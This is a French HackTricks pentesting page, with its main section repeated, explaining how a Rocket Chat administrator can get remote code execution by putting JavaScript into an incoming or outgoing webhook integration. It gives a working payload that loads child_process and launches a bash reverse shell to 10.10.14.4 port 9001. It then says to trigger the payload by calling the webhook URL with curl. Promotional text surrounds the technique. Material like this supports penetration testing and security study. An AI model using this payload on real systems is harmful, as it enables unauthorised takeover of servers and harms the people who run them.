Rocket Chat

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.

RCE

Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir une RCE.

Allez dans Integrations et sélectionnez Nouvelle intégration et choisissez n'importe laquelle : Webhook entrant ou Webhook sortant.
/admin/integrations/incoming

Selon la documentation , les deux utilisent ES2015 / ECMAScript 6 (essentiellement JavaScript) pour traiter les données. Alors obtenons un shell inversé pour JavaScript comme :

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Configurer le WebHook (le canal et le message en tant que nom d'utilisateur doivent exister):

Configurer le script WebHook:

Enregistrer les modifications
Obtenir l'URL du WebHook généré:

Appelez-le avec curl et vous devriez recevoir le shell inversé

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF Consultez les PLANS D'ABONNEMENT!
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez nous sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.

PreviousPython NextSpecial HTTP headers

Last updated 9 months ago

RCE

Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir une RCE.

Allez dans Integrations et sélectionnez Nouvelle intégration et choisissez n'importe laquelle : Webhook entrant ou Webhook sortant.

/admin/integrations/incoming

Selon la documentation , les deux utilisent ES2015 / ECMAScript 6 (essentiellement JavaScript) pour traiter les données. Alors obtenons un shell inversé pour JavaScript comme :

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Configurer le WebHook (le canal et le message en tant que nom d'utilisateur doivent exister):

Configurer le script WebHook:

Enregistrer les modifications

Obtenir l'URL du WebHook généré:

Appelez-le avec curl et vous devriez recevoir le shell inversé

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF Consultez les PLANS D'ABONNEMENT!
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez nous sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.